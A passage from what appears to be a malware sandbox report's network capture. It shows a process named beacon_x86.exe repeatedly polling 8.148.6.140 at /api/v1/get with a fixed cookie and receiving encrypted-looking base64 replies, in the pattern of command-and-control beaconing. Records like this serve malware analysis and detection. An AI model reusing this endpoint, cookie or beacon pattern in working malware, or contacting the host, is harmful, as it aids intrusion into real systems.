        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:27:27.779783010 CET293INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:27:27 GMT
        Server: nginx
        Content-Length: 108
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 50 57 44 6b 44 49 73 44 71 43 6d 6e 7a 78 47 59 44 51 31 76 36 31 38 71 59 44 6e 4f 54 71 45 2b 59 37 38 6a 72 37 51 74 38 58 2f 4c 41 5a 34 42 68 6a 41 44 6f 6b 68 6d 35 73 43 31 5a 6b 61 5a 75 52 4f 4a 45 73 63 7a 53 6d 68 33 76 56 46 34 71 6f 45 39 4d 34 31 31 37 6b 46 62 70 31 39 36 64 65 70 33 64 32 56 59 63 76 49 3d
        Data Ascii: PWDkDIsDqCmnzxGYDQ1v618qYDnOTqE+Y78jr7Qt8X/LAZ4BhjADokhm5sC1ZkaZuROJEsczSmh3vVF4qoE9M4117kFbp196dep3d2VYcvI=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        39192.168.2.8497498.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:27.888179064 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:27:28.878134012 CET441INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:27:28 GMT
        Server: nginx
        Content-Length: 256
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 52 39 70 4d 65 70 61 68 56 68 36 4f 35 78 76 79 6e 54 4c 73 42 70 50 66 77 51 73 42 37 64 50 74 49 71 2f 38 49 5a 6a 51 72 33 53 58 4c 6d 7a 58 59 79 41 59 62 62 65 52 72 38 39 67 4d 72 6e 5a 4a 49 6a 35 42 66 55 4d 6d 2f 43 57 7a 34 6f 58 4b 69 35 79 51 4e 30 53 31 62 51 75 73 76 59 33 39 62 6e 78 6f 33 2b 35 71 32 68 47 4d 39 55 31 70 76 6d 39 73 6b 48 6b 75 62 2f 47 45 79 61 49 58 4c 63 51 73 39 4a 7a 49 74 55 62 47 36 48 4b 50 65 42 79 30 68 5a 4d 6d 44 57 6f 7a 42 43 35 34 32 34 4c 61 4b 32 47 4f 4d 45 48 67 75 59 44 50 43 69 42 31 48 35 69 50 54 31 63 72 65 39 31 7a 67 61 4e 41 50 32 54 77 47 70 44 36 43 53 50 56 52 2b 54 37 65 4e 66 4d 42 50 5a 42 52 6d 47 75 59 49 70 7a 34 38 6d 45 4c 30 2b 72 71 46 4f 62 73 32 30 57 61 72 68 75 42 75 79 2b 67 4c 6a
        Data Ascii: R9pMepahVh6O5xvynTLsBpPfwQsB7dPtIq/8IZjQr3SXLmzXYyAYbbeRr89gMrnZJIj5BfUMm/CWz4oXKi5yQN0S1bQusvY39bnxo3+5q2hGM9U1pvm9skHkub/GEyaIXLcQs9JzItUbG6HKPeBy0hZMmDWozBC5424LaK2GOMEHguYDPCiB1H5iPT1cre91zgaNAP2TwGpD6CSPVR+T7eNfMBPZBRmGuYIpz48mEL0+rqFObs20WarhuBuy+gLj


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        40192.168.2.8497508.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:28.997987986 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        41192.168.2.8497518.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:29.950391054 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        42192.168.2.8497528.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:30.936470032 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:27:34.924786091 CET441INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:27:34 GMT
        Server: nginx
        Content-Length: 256
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 77 51 4e 58 45 69 2b 43 69 2f 32 4c 5a 34 2f 6c 56 47 58 71 61 51 4e 32 6b 41 66 6e 59 39 39 4c 50 55 65 35 30 38 62 57 53 45 75 68 72 70 4b 69 64 6b 39 75 38 73 59 58 32 6d 43 30 6a 6a 6f 6c 42 4d 77 4e 58 4c 6f 66 68 6d 72 44 71 54 5a 6c 4d 56 6e 35 39 2f 45 62 70 77 6d 72 6b 68 4f 78 32 6e 67 4a 34 34 35 6b 73 44 67 34 2f 36 4d 35 7a 4a 68 51 42 2f 49 57 42 71 72 48 53 30 4e 6f 49 5a 4d 72 6b 43 52 2b 50 6f 70 30 45 50 68 6d 78 39 70 32 6e 4c 34 6b 55 2f 36 50 74 4c 4b 51 70 6e 79 4c 35 76 62 54 46 37 46 4c 72 72 41 70 55 33 58 63 30 73 42 35 7a 70 36 32 4a 64 30 66 53 59 45 57 57 43 48 73 2b 35 4d 59 77 59 4c 6e 35 57 53 45 48 44 4b 39 59 70 6d 41 52 4c 69 51 2f 65 4b 4d 4f 6c 31 48 4d 36 35 72 46 38 73 79 71 57 46 53 75 78 6f 75 4b 69 61 36 55 79 47 48
        Data Ascii: wQNXEi+Ci/2LZ4/lVGXqaQN2kAfnY99LPUe508bWSEuhrpKidk9u8sYX2mC0jjolBMwNXLofhmrDqTZlMVn59/EbpwmrkhOx2ngJ445ksDg4/6M5zJhQB/IWBqrHS0NoIZMrkCR+Pop0EPhmx9p2nL4kU/6PtLKQpnyL5vbTF7FLrrApU3Xc0sB5zp62Jd0fSYEWWCHs+5MYwYLn5WSEHDK9YpmARLiQ/eKMOl1HM65rF8syqWFSuxouKia6UyGH


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        43192.168.2.8497538.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:35.046262980 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        44192.168.2.8497548.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:39.060409069 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        45192.168.2.8497558.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:40.093089104 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        46192.168.2.8497568.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:44.271183014 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        47192.168.2.8497578.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:45.254055977 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:27:49.239269972 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:27:49 GMT
        Server: nginx
        Content-Length: 192
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:27:49.239497900 CET192INData Raw: 65 37 72 39 74 31 68 6c 66 42 63 36 35 4b 74 4a 44 44 33 34 4f 77 49 56 76 5a 37 4a 34 71 52 37 41 35 73 76 41 4e 6d 62 45 32 4c 64 45 61 69 7a 45 41 54 62 58 50 65 77 4b 75 2f 44 6d 44 4c 36 71 70 39 31 54 6b 41 78 31 46 77 50 6b 4b 48 6f 67 62
        Data Ascii: e7r9t1hlfBc65KtJDD34OwIVvZ7J4qR7A5svANmbE2LdEaizEATbXPewKu/DmDL6qp91TkAx1FwPkKHogbLzAUciUzp5Y3zzVCR2mWLLg9fcjjTqWf3+iToV1dpytVtKdYLAnEkOQcff4DySEkmRmO/TvhU6waN2ykRPM6/YGT+j5XO25sDSLwDI9sRxdZZe


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        48192.168.2.8497588.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:49.398039103 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:27:50.366084099 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:27:50 GMT
        Server: nginx
        Content-Length: 300
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:27:50.366163969 CET300INData Raw: 30 6e 46 4e 31 71 6c 35 64 72 4a 53 46 38 55 4a 65 31 61 69 41 34 64 52 65 6b 6b 69 57 73 64 36 65 4a 32 34 64 70 65 55 4f 35 44 38 47 42 6a 4e 4f 57 4d 76 48 61 52 43 2b 72 38 70 34 34 68 32 39 32 33 69 46 31 49 70 6d 48 63 68 49 50 74 6a 46 44
        Data Ascii: 0nFN1ql5drJSF8UJe1aiA4dRekkiWsd6eJ24dpeUO5D8GBjNOWMvHaRC+r8p44h2923iF1IpmHchIPtjFDMWwmqpi8mzNByP8JdbHI2Xs3u3eXP0xZQvXRxqpSWGTYIHz9btGvsK+tDEIqkalAy4HMcQ0YW+gXrKZYnFrG8JH8YRiQCZQ1GgT5Ceh6S+ELWyEuQzNeJNEcEakIyDVv2hG/BkATPjG7DEm1DoFwgE6OER57rrZbo


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        49192.168.2.8497598.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:50.495047092 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        50192.168.2.8497608.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:51.537247896 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:27:53.160536051 CET401INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:27:52 GMT
        Server: nginx
        Content-Length: 216
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 5a 46 7a 46 62 62 66 54 55 73 50 48 6c 79 4c 2b 39 34 6b 6f 67 31 41 72 6c 7a 61 48 30 44 77 66 77 32 43 63 72 6f 6f 59 4d 63 65 6f 30 4a 35 72 4a 54 4b 42 70 63 66 77 59 39 63 4a 2b 65 42 57 69 33 31 70 63 45 4c 4b 62 48 32 32 54 79 6e 53 46 7a 4c 69 38 2f 4a 72 45 50 58 37 46 6a 72 54 77 50 4f 65 53 54 59 50 32 36 62 5a 36 73 73 4a 69 70 63 50 57 6f 4d 7a 39 4f 57 38 52 42 37 74 43 46 4b 39 36 2b 32 2f 74 30 64 37 69 4e 33 76 30 44 31 49 34 2f 70 4c 61 34 47 4a 47 59 73 62 74 4a 62 64 5a 78 66 48 6e 38 45 62 6c 2f 79 70 36 63 6b 54 46 74 6b 4d 4f 5a 71 4f 5a 59 51 74 4d 4e 73 66 35 38 6a 47 4b 71 58 35 77 48 51 4e 59 75 6d 47 57 41 3d 3d
        Data Ascii: ZFzFbbfTUsPHlyL+94kog1ArlzaH0Dwfw2CcrooYMceo0J5rJTKBpcfwY9cJ+eBWi31pcELKbH22TynSFzLi8/JrEPX7FjrTwPOeSTYP26bZ6ssJipcPWoMz9OW8RB7tCFK96+2/t0d7iN3v0D1I4/pLa4GJGYsbtJbdZxfHn8Ebl/yp6ckTFtkMOZqOZYQtMNsf58jGKqX5wHQNYumGWA==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        51192.168.2.8497618.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:53.283620119 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:27:54.252041101 CET485INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:27:54 GMT
        Server: nginx
        Content-Length: 300
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 7a 34 50 6c 4b 33 37 53 6f 79 6b 59 76 6a 6c 33 32 34 4a 54 61 65 51 59 38 64 78 44 68 38 4f 38 72 49 38 52 69 79 6a 42 46 6d 57 34 2b 62 4b 68 6a 32 71 69 6d 77 68 34 37 73 2b 2b 73 7a 72 42 6c 74 55 56 45 63 55 31 4f 72 38 6f 50 79 39 69 79 75 4d 37 48 47 71 51 34 43 56 2f 6d 54 64 42 73 30 33 48 31 47 6c 71 7a 79 69 56 2f 41 42 46 57 63 66 72 69 42 54 62 70 56 6a 57 2f 7a 45 57 65 68 58 6d 62 64 51 50 68 58 58 4f 4e 46 78 33 63 74 66 66 46 71 38 67 52 65 6e 58 57 63 62 5a 51 74 61 47 56 4f 6f 39 48 51 4f 43 33 37 69 51 38 65 50 76 4e 68 44 7a 6a 6c 37 2f 66 6c 44 35 70 73 6c 69 7a 37 4e 41 6b 67 75 44 2f 67 6f 31 35 48 55 32 61 6f 45 68 4a 66 39 43 77 46 35 74 39 4e 35 31 78 70 62 45 53 46 6d 54 6c 59 78 6c 43 55 78 32 42 6d 6e 6b 70 73 4d 6f 66 39 63 33 65 6c 74 53 65 37 41 57 4f 78 72 46 66 50 77 4c 51 64 4e 64 43 51 6f 6a 64 6c 75 4e 47 52 78 35 4d 63 6e 36 55 4f 78 42 43 4a 38 3d
        Data Ascii: z4PlK37SoykYvjl324JTaeQY8dxDh8O8rI8RiyjBFmW4+bKhj2qimwh47s++szrBltUVEcU1Or8oPy9iyuM7HGqQ4CV/mTdBs03H1GlqzyiV/ABFWcfriBTbpVjW/zEWehXmbdQPhXXONFx3ctffFq8gRenXWcbZQtaGVOo9HQOC37iQ8ePvNhDzjl7/flD5psliz7NAkguD/go15HU2aoEhJf9CwF5t9N51xpbESFmTlYxlCUx2BmnkpsMof9c3eltSe7AWOxrFfPwLQdNdCQojdluNGRx5Mcn6UOxBCJ8=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        52192.168.2.8497628.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:54.378495932 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:27:55.357736111 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:27:55 GMT
        Server: nginx
        Content-Length: 384
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:27:55.357903957 CET384INData Raw: 49 4f 6c 6e 49 48 4b 70 6f 6a 6c 37 7a 7a 68 54 4f 6a 61 4c 6b 4b 74 4d 68 30 33 55 46 2f 78 43 55 4e 78 44 46 42 56 4f 76 4f 54 6b 45 77 36 42 6c 74 4c 76 58 55 76 79 2b 56 34 43 2b 67 42 65 65 2f 68 4e 65 35 37 55 36 5a 5a 61 4c 73 47 72 68 62
        Data Ascii: IOlnIHKpojl7zzhTOjaLkKtMh03UF/xCUNxDFBVOvOTkEw6BltLvXUvy+V4C+gBee/hNe57U6ZZaLsGrhb+Tn2NUHdcQe9STjeU6xyjK7S0drVYSCz/2dgEl7nFHM3nVWwZbnUhlA5PgdRXwS8/hHaW6jxCSIxrloufbYSLf5zg8j3k2AU/OqlV0tX1eKxrvBOTzG+6v71Vx2++qMnpeIRQZYB5cjNTCnhNUsgt57MJWdHMwo2x


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        53192.168.2.8497638.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:55.584167957 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        54192.168.2.8497648.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:56.564357996 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        55192.168.2.8497658.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:57.530797958 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
